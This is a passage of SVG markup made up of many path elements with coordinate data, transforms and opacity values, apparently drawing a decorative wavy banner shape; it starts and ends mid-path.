4s2.62.88,4,1.37c1.18.43,2.38.8,3.57,1.19l.72-.74c-.37-1.73-.75-3.47-1.12-5.2l.63-.64c1.89,1.52,3.79,3,5.9,4.71l1-3.54,5,5.65c.67-2.08,1-3.29,1.59-5l7.26,7.64,4.83-3.54c.84,1.18,1.84,2.57,2.4,3.34,2-.65,3.7-1.25,5.41-1.7,2.5-.66,5-1.2,7.54-1.8l1.31-.91c0-.48.11-1,.23-2l1.08,1.71.76.53a15.34,15.34,0,0,0,9.54,4.36l1.86-1c.08-1.19.16-2.38.29-4.23,2.22,1.5,3.32,5.15,6.44,2.81L1815,92c2.37-1,4.78-1.88,7.06-3a13.68,13.68,0,0,0,2.71-2.53c.27.13.93.26,1,.53,1,4.54,5.54,4.74,8.52,6.81a2.14,2.14,0,0,0,2.07-.29c1.54-2.23,3.15-1.64,4.89-.42l1.45.44,8,.57.95-1.13c2.4,1.21,4.47,4.12,7.25.82.12-.15,1,.49,1.46.44,2.68-.26,5.39.31,7.94-1.61,1.18-.89,3.71-.85,5.22-.23,2.13.87,3.88,2.66,6,4.25,2.45-2.2,5.24-3,8.11-.22a1.27,1.27,0,0,0,.94.32c7.53-1.47,11.48,4,16.11,8.24l1.19.76.25.16c2.4-.85,4.72-2.61,7.11-3.61a16.85,16.85,0,0,0,5.31-.39,7.17,7.17,0,0,1,1.47.73V0H0V61.35C7.17,64.37,14.69,67.61,13.9,65.4Z\"\n transform=\"translate(0 0)\"></path>\n <path d=\"M578.73,49.78c-.71.36-1.4.75-2.11,1.12C577.33,50.53,578,50.14,578.73,49.78Z\" transform=\"translate(0 0)\"></path>\n <path d=\"M1346.24,53l-.13,0Z\" transform=\"translate(0 0)\"></path>\n <path d=\"M1366.87,57.76c-.79-.16-1.57-.35-2.35-.56q-.45,1.17-1,2.37a11.27,11.27,0,0,1,3.33,2.15A5.14,5.14,0,0,1,1366.87,57.76Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1358.64,55.7c-2.72-.47-5.42-1.38-8.11-2.09a20.91,20.91,0,0,0-5.31,1.38l-2.37-2.32a49.11,49.11,0,0,1-9.39-.28c-1.41-.22-2.83-.34-4.24-.51.42.31.8.8,1.27.91,4.07,1,7.9,2.53,12.35,2.59,4.94.07,9.84,2,14.78,3.07,1.64.35,3.48.1,5,.73l.74.33c-.23-.94-.46-1.88-.7-2.84A37.55,37.55,0,0,0,1358.64,55.7Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1048.36,50.39a132.31,132.31,0,0,1-17.87,1.43c-8-.06-16-.76-23.94-1.35-6.42-.48-12.86-.91-19.21-1.87s-12.83,2.07-19-1.37c-2.08-1.15-4.82-1-7.19-1.72-5.73-1.65-11.41-3.46-17.13-5.15-4.34-1.28-8.72-2.44-13.07-3.7q-10.73-3.1-21.41-6.26c0,.49.11,1,.17,1.49l.15.16,4.5,2.05c8.53-.06,15.79,4.83,23.95,6.26a9.88,9.88,0,0,1,2.6,1.37l2.1.53c2.58.87,5.12,1.93,7.75,2.59,4.42,1.1,9,1.64,13.34,3,3.34,1.06,6.4,3,9.58,4.56l1.92.11c1.35-1.93,2.77-3.19,4.72-.6.24.31,1,.67,1.14.54,4.17-3,8.46,1.9,12.67-.18.41-.2,1.27.58,1.94.85s1.3.73,1.71.55c6.17-2.8,12-1.76,17.88,1.09,1.64.8,3.9.31,5.58,1,3.35,1.49,5.58.32,8.39-1.6,1.63-1.11,4.73-.09,7.16,0,.88,0,2,.42,2.58,0,3.47-2.14,7.39-1.74,11.14-2.29,2-1,5-.17,5.46-3.49l-2.17-.72C1052,48.66,1050.24,50.15,1048.36,50.39Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M593.88,22.35a11,11,0,0,0-2.19,4c-.27,1.18.34,2.56,0,4.16-.47-.63-1.3-1.23-1.35-1.89-.15-2.13-.47-3.36-3.23-2.79-.81.16-2.08-1.93-3-2.08l-13.75,3.14c.09,1.25.18,2.5.31,4.21l3.47-2.63c-.11,2.12-.16,3.26-.22,4.4.86,1.09,1.77,3.13,2.55,3.08,2.1-.13,4.13-1.17,6.19-1.84a7.84,7.84,0,0,1,2.46-.46c.81.12,2,1.24,2.25,1,2.3-2,4.45-1.47,7.06-.56,1.14.4,3.79-.72,4.26-1.8,1-2.32,2.63-2.12,4.42-2.16a35,35,0,0,1,4.6,4.14c2.27,2.9,4,3.48,6.9,1.64l2.9-2.16a28,28,0,0,0-4.47-.2c-2.5.27-3.81-.73-4.28-3.14-1.15-5.81-3.88-6.79-8.81-6.51-1.31.07-2.66-.83-4-1.23C595.25,22.46,594.08,22.08,593.88,22.35Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M840.13,15.47a34.57,34.57,0,0,0-5.42-2.36,79.56,79.56,0,0,0-9-1.52c-17.69-2.24-35.35-5-53.11-6.47-15.17-1.27-30.47-1.2-45.71-1.52-3.82-.08-8-1.2-11.32,2a1,1,0,0,1-1,.09c-2.93-3-5.59-.7-8.32.37-4.62.08-9.25.13-13.88.27a15.85,15.85,0,0,0-2.84.56,20,20,0,0,0,3.75.77c5.35.11,10.71.08,16.06.09L714.1,7c1.65.72,3.2,1.14,4.27-1a1.85,1.85,0,0,1,1.26-1c3.61.13,7.22.38,10.83.6l4,0,7.61.72,1.29-.11c1.7,0,3.4,0,5.09.17,1.53.15,3.28,1.13,4.53.66,7-2.64,14.1-.47,21.12-.67,4.07-.12,8.2,1.38,12.27,2.29.76.16,1.39.94,2.08,1.44h1.74c2.16-2.4,4.22-1.09,6.28.17l4-.62c5.66.68,11.33,1.34,17,2.05a5.11,5.11,0,0,1,1.43.7l4,0,2.16,1.18c2.65.24,5.3.69,8,.67a4.6,4.6,0,0,1,4.76,2.91,3.36,3.36,0,0,0,2,1c1.77-2.47,4.07-1.38,6.33-1.25,1.11.07,2.27-.75,3.4-1.17C846.24,15.49,842.76,11.56,840.13,15.47Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M377.36,57.38l3.48,3.7c2.16,0,4.31,0,6.46.1,2.56.18,5,1.74,7.54,2.67h.23q2-1.53,4-3.08a4.77,4.77,0,0,1-1.22,3.11c2.16-.47,4.32-.93,6.46-1.45a5.59,5.59,0,0,0,1.37-.82c-1.83-.71-3.62-1.86-5.51-2.06C392.6,58.76,385,58,377.36,57.38Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M368.88,56.73c-5.39-.38-10.86.29-16.23-.24-3.07-.31-5.38-.62-6.24,3-8.56-4.77-9.34-4.7-13.17,1.16,4.62-3.58,8.55-2.1,12.23,1.59.35.35,1,.36,1.58.52a20.12,20.12,0,0,0,3.44-1.34c3.29-2,6.73-3.32,10.6-2.59s7.48,1.71,11.22,2.57c2.84-.06,5.69-.22,8.53-.29l-3.48-3.7Q373.13,57,368.88,56.73Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M615.28,43.58a6.49,6.49,0,0,1-3.64.67c-2.37-.09-4.73-.22-7.1-.34-2,1.84-4.12,2.37-5.53,1.37l-1.27-.4c-3.89,2.68-8.45,3.06-11,.9L580,49.12l6.27,2.67c3.06-1.3,6.64-2.9,10.31-4.27.66-.25,1.68.48,2.54.77l1.28,0c2.18-2.06,4.28-1.29,6.42.13a4.86,4.86,0,0,0,2.56,1.08c3.71-.3,7.4-.81,11.1-1.31.21,0,.35-.54.52-.82-.26-.29-.53-.57-.79-.85Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M507.12,48c-.67.39-1.39,1.18-2,1.11-3.18-.35-6.35-.9-9.5-1.46-.31-.06-.52-.64-.78-1h-1.36l-6.75-.09H484l-10.48,2.29,0,1.24c5.62.81,11.31,2.46,16.85,2.09,3-.2,5.47-.82,8,1.06.6-3.51,1.47-3.82,4.77-3.15,2.15.43,4.49-.12,6.75-.24L508.44,48Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M850.88,16.19l5.58,2.33q15.19,3.06,30.4,6.12a22,22,0,0,1,2.23.68l2.07.77,5.43,3.21a17.66,17.66,0,0,1,4.35-.07,48.5,48.5,0,0,1,5.84,2.1l1.39-1.16c-3.15-1-6.25-2.3-9.46-3.05C882.78,23.41,866.82,19.82,850.88,16.19Z\" transform=\"translate(0 0)\"\n opacity=\"0.3\"></path>\n <path d=\"M576.37,50.06c-3.79.19-7.58.34-11.36.5l-1.29.43c-.05.49-.11,1-.16,1.47l.86.35,1.25-.23h.72l2.67.39a48.3,48.3,0,0,0,5.4-1.12,31.65,31.65,0,0,0,4.27-2.07l-2.08-.28C576.55,49.69,576.47,50.06,576.37,50.06Z\" transform=\"translate(0 0)\"\n opacity=\"0.3\"></path>\n <path d=\"M1059.41,43.77l-.77.61c-.24,1.13-.47,2.26-.71,3.39a18.41,18.41,0,0,1,2.82-2.05c.93-.45,2.43-1.08,3-.67,2.79,1.93,4.23.19,5.75-1.68a22.42,22.42,0,0,0-4.62-.68A37.77,37.77,0,0,0,1059.41,43.77Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M486.42,71.5c-3.79-.28-7.57-.59-11.36-.88l.77,1.08,3.3.13,11,1.19.4-1-.42-.41C488.86,71.59,487.64,71.58,486.42,71.5Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M527.5,50l-2.07.62,2.17,4.4L531,51.23c-.47-.39-.94-.78-1.4-1.18Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M614.07,8.49h-2l0,1.26,2.81.44C614.57,9.62,614.32,9.05,614.07,8.49Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1321.16,59.25l-.73.86Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1320.43,60.11l-.65.75Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1325.18,54.36c-1.27,1.52-2.76,3.37-4,4.89C1322.42,57.73,1323.91,55.88,1325.18,54.36Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1326.56,52.74c-.21.23-.42.48-.65.75C1326.14,53.22,1326.35,53,1326.56,52.74Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1327.11,52.14c-.17.17-.35.37-.55.6C1326.76,52.51,1326.94,52.31,1327.11,52.14Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1325.91,53.49l-.73.87Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1319.78,60.86l-.55.61Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M490.08,71.64l.42.41.95-.4c-.2-.67-.4-1.34-.59-2Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1086,41.78l-4.89-.68C1082.87,44.39,1083.61,44.49,1086,41.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1076.57,42.78l.45-1.1-1.31.45Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M565.79,29.66c.06-1.93-.63-4.54,2.58-4.94-1.36-3.09-2.72-.45-3.76.19s-1.65,1.89-2.45,2.88c.21-2.7-.49-6.21,3.19-6.42,5.16-.29,9.71-4.39,15.25-2.3.42.15,1.4-1.2,2.12-1.86-3.88-.15-7.73-1.19-11.6.57-2.71,1.23-6,1.38-8.43,3-1.57,1-2.22,3.68-2.88,5.74-.33,1.07.65,2.59.25,3.58A4.58,4.58,0,0,1,557.24,32c-.34.1-1.7-1.43-1.62-2.1a49.65,49.65,0,0,1,1.49-6.3A3.94,3.94,0,0,0,554.27,25c-.57.65-.81,1.6-1.41,2.19-2.5,2.45-2.2,7.69,1.09,8.56,2.94.79,6.48.12,9.56-.67C565.92,34.5,565.73,31.88,565.79,29.66Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M590,17.37c2.15,1.32,4.17.62,5.05-2.05-3-.28-6-.64-9-.8-1.78-.1-3.49.23-3.33,2.69C585.19,16.1,587.47,15.79,590,17.37Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M523.5,50.6l-6.22-.66C519.18,51.84,521.13,53.28,523.5,50.6Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M544.57,52.59l4.79-.53-6.14-.22Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M539.19,51.31H535Q537.09,54.13,539.19,51.31Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M674.64,5.51c3.24,2.44,6.72,1.7,10.21.74C681.62,3.7,678.1,5,674.64,5.51Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M621.45,9.64l-4,.6C619,11.45,620.43,12,621.45,9.64Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M557.51,52l3.44.5C560,51.14,558.9,50.51,557.51,52Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M678,35.46l-1.27,0c-2,.15-4.63-2.1-5.91,1.06-.88,2.19-.79,4.75,1.62,5.94,1.26.62,3.1,0,4.67,0C676.91,40.05,681.62,38.29,678,35.46Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M642,34.88l-1.44,2.06,2.08,3.75c-5.91.72-7,.08-6.56-3.72q.84-2.46,1.7-4.92L642,33.53c0-1,.27-2.25-.21-3a42.76,42.76,0,0,0-3.9-4.46c-5.63,3.6-4.11,9.68-5.71,14.76,3.08.93,5.82,1.68,8.51,2.58,1.68.55,2.88.21,2.71-1.65A63.89,63.89,0,0,0,642,34.88Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M654.52,37.15c-3-1-4.73.23-5.47,3.53a46,46,0,0,0,5.11,3.74,2.69,2.69,0,0,0,2.54-.71C658,41.13,656.79,37.88,654.52,37.15Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M380.12,72.88h1.16l2.19-5.26-6.27.06Q378.67,70.29,380.12,72.88Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M395.07,63.86l-.15.12c1.42.52,2.34.41,3-.09l-.49.1Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M399.1,60.78q-2,1.55-4,3.08l2.32.13.49-.1A4.77,4.77,0,0,0,399.1,60.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M399.1,60.78q-2,1.55-4,3.08l2.32.13.49-.1A4.77,4.77,0,0,0,399.1,60.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1664.81,72.6c-3.76.14-6.25-1-5.79-5.51-8.24.44-12.2-4.51-14.84-10.85l-5-.11,1.38-4.74L1637.29,50l-1.19-.25-2.21,3.28c-3.28,0-6.71-.25-10.11,0-2.36.17-3.93-.55-5-2.57-2.3.18-4.39.65-4.6,3.8-3.45-1.88-5.94.25-8.64,1.62-2.88,1.45-5.82,2.79-8.73,4.18,0,3.7-3.85,4.65-5.47,7.21-.19.3-2.22-.56-4.11-1.08a5,5,0,0,1-1.9,1.28c-1.07.3-2.75.47-3.42-.14-2.52-2.26-4.74-4.86-7.28-7.57L1569.3,64c.26.79.58,1.71,1,3-4.84,0-8.94-.8-11.86-4.8-1-1.44-4.38-.65-5.42,1.28-.62,1.15-1,2.4-1.61,3.69-3.49-1.8-6.64-2.52-10.12.2l-1-6.9-1.73,1a28.62,28.62,0,0,1-.39,3.35,3,3,0,0,1-5,1.65c-3.85-3.61-4.45-3.68-8.87-1a9.11,9.11,0,0,1-1.13.48c-.07-1.6.41-3.62-.34-4.33-1-.89-2.92-.69-4.44-1a11.3,11.3,0,0,0-3-.6,4.21,4.21,0,0,0-2.82,1.14c-3,4.1-5.26,4.64-9.73,2.09a38.14,38.14,0,0,0-3.73-1.53l3.55,4.65c-3.76-.14-5.79-1.6-7.27-3.65-1.3-1.8-2.32-2.25-4.45-1.1-3.31,1.78-6.88,3.07-10.48,4.63l-1.82-2.69c-1.9.35-2.84,4-5.56,1.39.28-.32.56-.59.8-.9.67-.86,1.71-1.67,1.85-2.62.09-.57-1.27-1.93-1.92-1.9a3.45,3.45,0,0,0-2.45,1.77c-.94,2.21-2.11,3.13-4.3,1.57l-3.38,4-2.57-3.17L1458,65.6l-.72-.38c.4-1.32.81-2.64,1.36-4.43a8.88,8.88,0,0,0-1.73,1.1c-2.58,2.82-2.2,2.48-4.89-.34-1.6-1.68-4.57-2.06-7.18-3.14l-2.06,6-6.73-4.13-1.95,4.61c-3.35-1.89-1.19-4.44-1.42-6.94l-3.06,1.52c-2.06-4.1-5.47-6.59-8.27-6l0,0c0,1.45,0,2.91-.17,4.35s-.11,3.36-.89,3.8a24.34,24.34,0,0,1-7.85,3c-.84.14-2.57-2-3-3.39-.92-2.73-2.66-2.19-3.72-.87-1.66,2.07-3,3.61-5.78,1.86-.4-.25-1.47.59-3,1.26.28-3.12.52-5.88.78-8.8-3.9.23-4.2,4.76-6.84,7.06l2.77.25c-.3,2.21-.58,4.37-.9,6.79-4.36,1.6-8.33,1-12-3.82-.45,2.68-.71,4.27-1,5.86l-1.23,0-.09-5.57c-4.85-.22-5.88-1.3-7.45-7.5a10.27,10.27,0,0,0-1.53-2.56c-.86.79-2.06,1.42-2.52,2.39a.8.8,0,0,0-.07.2,17.91,17.91,0,0,0,3.35.38,31.12,31.12,0,0,1-2.69,4.41,7.22,7.22,0,0,0-.73-.83,7,7,0,0,0,2.45,3.09,4.87,4.87,0,0,1,1.22,2c.26.57.23,1.69.54,1.77,4.24,1.08,3.72,5.67,6.08,8.1a3.78,3.78,0,0,1,.28,1.17c4.9,1.81,11.61,0,7.49,7.22.93,0,1.86,1.46,2.78,1.5a1.93,1.93,0,0,0,1.31-1.52c0-.09.18-.23.25-.21,4.15.85,5.2-1.72,6-5,.1-.38,2.77-.11,5.19-.16.64-1.69,1.6-4.22,2.34-6.2,2.16-.59,4-1,5.69-1.6,2.08-.75,3.19-.5,3.27,2a2.8,2.8,0,0,0,4.42,2.37l2-1.18,1.72-1.08c.23.8.41,1.44.59,2.08l4.49-1.27c.76-3.18,4.75-6.31,7.59-5.52,1,.27,1.55,1.92,2.32,3,2.69-.45,5.41-.82,8.09-1.36,4.48-.92,9.45,2.06,13.59-1.73.22-.21.86.05,1.31.08a27.18,27.18,0,0,0,5,.23c2.43-.32,4.79-1.43,7.21-1.5,7.3-.21,14.6-.08,21.91-.07,3.35.46,6.71.91,10.06,1.38l4-.22c1.29-.37,2.7-1.28,3.85-1,3.3.72,6.47,2.06,9.62-.47a3.24,3.24,0,0,1,2.29-.3c5.84.94,11.67,1.9,17.49,3a11.89,11.89,0,0,1,2.91,1.47l1.34-.12a7.76,7.76,0,0,1,2.34-1c3.41-.24,6.83-.33,10.25-.46a.46.46,0,0,1,.33.07c5.27,4.14,11.33.27,17,2l3,5.61c2.23-3.22-.92-7.65,3.41-8.37,2.25.11,4.63-.19,6.71.47,1.82.57,4.56.94,4.14,4.18a15.57,15.57,0,0,0,.45,3.63l3.83-.53c-.31-1-1-2.12-.76-2.82.37-1,2-2.38,2.25-2.23,2.63,1.6,3-.55,4.13-3,3.4,2,6.75,3.57,9.72,5.7,2,1.42,3.35.52,5-.2,2-3.33,3.3-3.71,6.5-2.07a36,36,0,0,0,3.67,1.4c1.91-4.84,8.35-7.47,13.09-5.71a10.29,10.29,0,0,0,3.93.58c2.66-.1,4.6.16,5.78,3.26s3.55,1.73,5.58-.06c5.34,4.46,11.13,7.37,18.27,5.13-.56-1.46-1.13-2.92-1.69-4.37C1668.51,72.76,1666.65,72.53,1664.81,72.6Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1367.53,62.55a31.12,31.12,0,0,0,2.69-4.41,17.91,17.91,0,0,1-3.35-.38,5.14,5.14,0,0,0-.07,4A7.22,7.22,0,0,1,1367.53,62.55Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1367.53,62.55a31.12,31.12,0,0,0,2.69-4.41,17.91,17.91,0,0,1-3.35-.38,5.14,5.14,0,0,0-.07,4A7.22,7.22,0,0,1,1367.53,62.55Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1350.53,53.61a12.91,12.91,0,0,1,5.93.69c.72.26,2-.44,2.76-1a12.13,12.13,0,0,0,2-2.32c.51,2.08,1,3.92,1.4,5.67l1.88.53a13.59,13.59,0,0,0,.91-3.92,7.69,7.69,0,0,0-1.12-4.78c-3.86-5.23-3.61-8.25,1.59-12.2l-1-2.41-3.27,1.17c-1.39,3.27-4.58,2.18-7,2.88l-4.15.64-2.78,5.82c.14.88.27,1.75.41,2.62,1.78,1.32.75,2.12-.54,2.86-1.6.92-3.2,1.82-4.8,2.73l.07.06,1.06,0A24.11,24.11,0,0,1,1350.53,53.61Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1363.39,59.73l.08-.16-.13-.06Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1362.64,56.67c.24,1,.47,1.9.7,2.84l.13.06q.6-1.2,1-2.37Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1362.64,56.67c.24,1,.47,1.9.7,2.84l.13.06q.6-1.2,1-2.37Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1350.53,53.61a24.11,24.11,0,0,0-6.62-1l-1.06,0,2.37,2.32A20.91,20.91,0,0,1,1350.53,53.61Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1350.53,53.61a24.11,24.11,0,0,0-6.62-1l-1.06,0,2.37,2.32A20.91,20.91,0,0,1,1350.53,53.61Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1904.67,105c-4.63-4.2-8.58-9.71-16.11-8.24a1.27,1.27,0,0,1-.94-.32c-2.87-2.78-5.66-2-8.11.22-2.16-1.59-3.91-3.38-6-4.25-1.51-.62-4-.66-5.22.23-2.55,1.92-5.26,1.35-7.94,1.61-.49,0-1.34-.59-1.46-.44-2.78,3.3-4.85.39-7.25-.82l-.95,1.13-8-.57,1.62,1.88,1.31-.09,3.89.68a27.36,27.36,0,0,0,5.26.81c3.42-.11,6.85-.51,10.26-.92a6.53,6.53,0,0,0,2.39-1.06c2.51-1.5,4.93-.16,5.11,2.8a7.37,7.37,0,0,0,.4,1.8c3.42-.78,6.66-2.57,9.08-1.79,2.83.9,5.25.33,7.87.48,1.77.1,4.3.69,5.07,1.94C1897.6,104.32,1899.41,105.54,1904.67,105Zm-54-10.88Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1779.25,94.49c-.56-.77-1.56-2.16-2.4-3.34L1772,94.69l-7.26-7.64c-.54,1.71-.92,2.92-1.59,5l-5-5.65-1,3.54c-2.11-1.68-4-3.19-5.9-4.71l-.63.64c.37,1.73.75,3.47,1.12,5.2a6.41,6.41,0,0,1,1.94-.09c4.59,1.21,9.17,2.43,13.71,3.79a12.94,12.94,0,0,1,2.87,1.77c3-1.41,6-3.41,9,0l1.22-.18c1.74-.63,3.55-1.15,5.23-1.93,2.21-1,4.32-2.27,6.47-3.43-2.52.6-5,1.14-7.54,1.8C1783,93.24,1781.29,93.84,1779.25,94.49Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1712.48,80.52c-2.44,2.26-4.44,1-6.69.37-1.71-.45-3.42-.87-5.13-1.31l.38.94c-1.25.82-2.67,2.51-3.7,2.3a26.81,26.81,0,0,1-7-3A28.61,28.61,0,0,0,1675,76.56l-1.76.73a2.52,2.52,0,0,1,.08.55c2.37.33,4.74.68,7.12,1,.54.07,1.18-.17,1.65,0,2.47,1.08,4.91,2.26,7.36,3.4L1692,82c1.18.3,2.57.3,3.5,1,2.19,1.5,4.06,2,6.39.17,1-.73,2.92-1.24,3.82-.74,4.17,2.29,8-.62,12-.33C1716.35,80.15,1714.05,79.07,1712.48,80.52Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1899.35,115.9l0,0c.09.56.18,1.13.28,1.7,2.05-.79,4.27-.89,7.51.73,0-1.07,0-2,.05-2.8A10.94,10.94,0,0,0,1899.35,115.9Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1836.36,93.51a2.14,2.14,0,0,1-2.07.29c-3-2.07-7.49-2.27-8.52-6.81-.06-.27-.72-.4-1-.53a13.68,13.68,0,0,1-2.71,2.53c-2.28,1.15-4.69,2-7.06,3l4.21.73,1.28-.88,2.63-.37c1.11-.09,2.37-.56,3.3-.2,3,1.16,6,2.63,8.94,4l3.23-1,2.65-1.15C1839.51,91.87,1837.9,91.28,1836.36,93.51Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1727.53,82.77c-2,1.34-7.35,1.1-9.59-.42-.6,3.09,1.11,3.46,3.55,3.09,6-.94,11.13.12,13.86,6.49.34.8,1.84,1.12,2.81,1.66-1.94-3.06-4-6.07-5.79-9.2C1731.16,82.33,1729.86,81.22,1727.53,82.77Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1795.58,90.34l4.15,5.71,3.54.31,2-.34-.12-1.32A15.34,15.34,0,0,1,1795.58,90.34Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1743.5,89.25c-1,.45-1.29,2.49-1.89,3.84l3-3,4,3.33,2.54-1.61c-1.19-.39-2.39-.76-3.57-1.19C1746.11,90.13,1744.42,88.82,1743.5,89.25Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1807.27,89.45c-.13,1.85-.21,3-.29,4.23l2.87,1,3.18-2C1810.42,94,1809.32,90.83,1807.27,89.45Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1813,92.69a5.39,5.39,0,0,0,.68-.43Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1741.6,93.1l-2.77.67C1740.15,95.2,1741.08,95,1741.6,93.1Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1793.51,90.08l1.31-.27-1.08-1.71C1793.62,89.11,1793.56,89.6,1793.51,90.08Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1380.52,59.15c2.15,1.79,3.21.94,5.41-4.5a45.93,45.93,0,0,0-3.11-5.31c-.66-.85-2-1.21-3-1.79-.22,1-.94,2.3-.57,3,1.18,2.42.69,4.27-1.13,6.07l-3.17-.95-1.07.76,2.7,4.92Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1362.6,59.18c-1.5-.63-3.34-.38-5-.73-4.94-1.05-9.84-3-14.78-3.07-4.45-.06-8.28-1.57-12.35-2.59-.47-.11-.85-.6-1.27-.91l-1.29-.41c-.71-.12-8.9,11-9.52,10.67-16.28-9.53-32-9.06-39.59,8.59-1.77,4.08-5.83,4.23-10.7,3,.88,2.86,3.27,1.83,5.35,1.7,4.06-.25,8.11-.74,12.16-.66,7,.15,13.29-5.28,20.49-5.78,4.87-.34,7.63-5.18,12.53-4.58,2.64.33,12.67-10,15.23-9.32,4.88,1.38,9.82,2.69,14.55,4.5A46.36,46.36,0,0,1,1358.72,65a35,35,0,0,1,3.57,3,27.72,27.72,0,0,0,5.24-5.44A11.18,11.18,0,0,0,1362.6,59.18Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1265.91,71.75a4.27,4.27,0,0,1-2.24.72c1.53.5,3,1,4.45,1.31a6,6,0,0,1-.16-.67C1267.84,72.52,1266.21,71.56,1265.91,71.75Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1228.49,66a13.19,13.19,0,0,0-4-.24c-2.93,0-5.88.15-8.8-.06-7-.51-13.91-1.31-20.88-1.76-6.08-.39-12.18-.55-18.27-.68-7.89-.18-15.79-.24-23.68-.32-4,0-8.08-.08-12.12,0-2.11,0-4.22.37-6.33.54a5.91,5.91,0,0,1-2.61,0c-3.66-1.62-7-1-10.37.87-.75,1.58-1.48,1.55-2.2,0l-1.22,0-2.47,2.29a30.58,30.58,0,0,1-3-4.62c-.44-1-.08-2.38-.81-4l-2.85,3c-.14-.28-.53-.73-.43-1,2-4.41-.9-6.44-4-8.29a3.72,3.72,0,0,0-2.5-.41c-6.11,1.53-6.11,1.57-9.09-4.29a30,30,0,0,1-1.2-2.79c-1.64-4.42-1.64-4.43-5.69-2.55-2.35,2.71-3.09,2.61-4.89-.69l-4,.59-.45,1.1-.86-.65-6.19,1.23c-1.52,1.88-3,3.62-5.75,1.69-.59-.41-2.09.22-3,.67a19,19,0,0,0-2.82,2l-2,.7c-.44,3.32-3.51,2.53-5.46,3.49l5,4.48a74.68,74.68,0,0,0,4.52-7c2-3.94,5.19-1.66,7.81-2.26l.54,1-6,4.6c3.36.48,5.89,1.22,8.44-.93,1-.87,2.82-.88,4.28-1.19,1-.22,2.4.09,3.1-.48,2.25-1.84,4.36-.89,5.7.66.68.79-.24,3-.5,5l9.51,3.68c-.43,1.15-.94,2.51-1.44,3.87,3,0,5.92-.2,8.84.05,4.21.35,8.52,0,12.2,3.2,2,1.71,4.78,2.65,7.38,3.28,1.4.33,3.81-.24,4.58-1.28,1.7-2.31,4.35-3.72,